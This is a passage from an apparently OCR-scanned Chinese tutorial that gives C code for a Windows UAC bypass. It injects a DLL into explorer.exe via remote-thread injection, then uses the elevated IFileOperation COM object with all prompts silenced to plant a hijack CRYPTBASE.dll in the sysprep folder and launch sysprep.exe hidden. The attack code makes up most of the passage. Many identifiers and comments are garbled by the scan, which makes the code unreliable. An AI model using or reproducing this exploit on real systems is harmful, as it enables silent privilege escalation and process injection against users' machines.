else break; } } while (Process32Next(hSnap, &pey)); //LoadL i braryW函数的地址函数的地址 //要注入的dll的绝对路径 hKerne1=GetModu1eHand1e(L^Kerne132. dll"); //填充呵化仏结构 myinjl. myloadlibraryw=(pLoadLibraryW)GetProcAddress(hKernel, ^LoadLibrar yW〃); myinjl. myfreelibrary=(pFreeLibrary)GetProcAddress(hKernel, ^FreeLibrary^ ); //获取mydll.dll的绝对路径,mydll.dll和本程序在同一目录下 GetCurrentDirectoryW(sizeof(szbuffer), szbuffer); wcscat (szbuffer, L^Wmydll. dll"); //将mydll•dll的绝对路径写入explorer•exe进程的内存中,并且保存地址 myinjl. szFul1D1lName=(wchar_t*)VirtualAllocEx(hproc, 0, (wcslen(szbuffer) +1)*sizeof(wchar_t), MEM_COMMIT | PAGE_READffRITE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hproc, myinjl. szFullDllName, szbuffer, (wcslen(szbuffer )+1)*sizeof(wchar_t),&length); //^myinj1结构写入explorer.exe进程内存中,这个结构保存了LoadLibraryw和FreeL i brary函数的地址 lpparamter=VirtualAllocEx(hproc, 0, sizeof(inj), MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READffRITE); WriteProcessMemory(hproc, lpparamter, &myinjl, sizeof(inj), &length); //将注入的代码写入£1口10^^故6进程内存中,注入的代码主要功能就是加载 mydll.犯1并且在加载后free. pstart=VirtualAl1ocEx(hproc, 0, (SIZE_T)&RemoteEnd-(SIZE_T)&RemoteStart, M EM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READffRITE); WriteProcessMemory(hproc, pstart, &RemoteStart, (SIZE_T)&RemoteEnd-(SIZE_T )&RemoteStart, &length); //^EExplorer. 6义6中创建线程 CreateRemoteThread(hproc, 0, 0, (LPTHREAD_START_ROUTINE)pstart, lpparamter, 0,0); [/code] 下面我们看看RemoteStart的代码: [code] static void RemoteStart(PV0ID lpparamter) { pinj pminj; HM0DULE hlib; pminj=(pinj) lpparamter; //lpparamter指向inj结构体 hlib=0; hlib=pminj->myloadlibraryw(pminj->szFullDllName); pminj->myfreelibrary(hlib); } [/code] 接下来就是在mydlLdll中创建Ifileoperation对象,并且操作它复制文件了,然后 运行sysprep. exe来加载特殊的CRYPTBASE. dll。附件中的(mydll工程) [code] BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_cal1, LPYOID lpReserved switch (ul_reason_for_cal1) { case DLL_PROCESS_ATTACH: //表示dll被加载 { BIND_0PTS3 bo; IFileOperation * ifop=0; IShellItem *pIstsou=0; IShellItem *pIstdes=0; IShellItem *pIstdel=0; SHELLEXECUTEINFO seinfo={0}; wchar_t szMyFull[128] = {0}; //以单线程的方式创建COM对象 CoInitialize(NULL); //有时候0006切1^6(^通过命名绑定创建001对象并不会成功,则要调用 CoCreat e Instancea 建00旧对象。 if (S_OK==CoCreateInstance(—uuidof(FileOperation), 0, CLSCTX_LOCAL_SERVER |CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, _uuidof(IFi1eOperation), (void* *)&ifop) II S_OK==CoGetObject(L^Elevation:Administrator!new:{3ad05575-8857-4850-9277-ll b85bdb8e09}", &bo, —uuidof(IFileOperation), (void**)&ifop)) /*设置IfileOperation,这个参数很重要 用IFileOperation这个COM对象来操作文件,和exploere.exe效果一样,复制文件的时候,当文件已经存在,会弹框请求是否覆盖,当要提权的时候,也会请求是否 继续。所以要通过设置?1&83让这些对话框都不显示出来,即静默。 F0F_N0C0NFIRMATI0N对于对话框,全部选择是 FOF_SILENT 不显示进度条 FOFX_REQUIREELEVATION 用户期望提升权限,不显示对话框*/ if(S_OK==ifop->SetOperationFlags(F0F_N0C0NFIRMATI0N | FOF_SILENT | FOFX_REQUIREELEVATION )) //复制 e:\mycryptbase. dll 到 c:\\windows\\system32\\sysprep 目录下并改名为 CRYPTBASE.dll if(S_OK==SHCreateItemFromParsingName(L"e:WmyCRYPTBASE. dll", 0,—uuidof( IShellItem), (void **)&pIstsou)) if(S_OK==SHCreat eItemFromPars i ngName(L"c:\\windows\\system32\\sysprep", 0,—uuidof(IShellItem), (void **)&pIstdes)) if(S_OK==ifop->CopyItem(pIstsou, pIstdes, L"CRYPTBASE. dll", 0)) if (S_OK==i f op->Perf ormOperat i ons ()) //执行操作 { //调用shellexecuteexw系统函数来运行878口作口. exe seinfo. cbSize=sizeof(SHELLEXECUTEINFO); seinfo. fMask=SEE_MASK_NOCLOSEPROCESS; seinfo. lpFile=L^c:\\windows\\system32\\sysprep\\sysprep. exe〃; seinfo. lpDirectory=0; seinfo. nShow=SW_HIDE; //隐藏程序窗 口 seinfo. lpParameters=0; if(ShellExecuteExW(&seinfo) && seinfo. hProcess) { ffaitForSingleObject(seinfo. hProcess, INFINITE); } //等待sysprep.exe执行完毕,删除目录下的cryptbase.sll文件 if(S_OK==SHCreat e11 emFromPars i ngName(L"c:\\windows\\system32\\sysprep\\ CRYPTBASE. dll〃,0,—uuidof(IShellItem), (void**)&pIstdel)) |
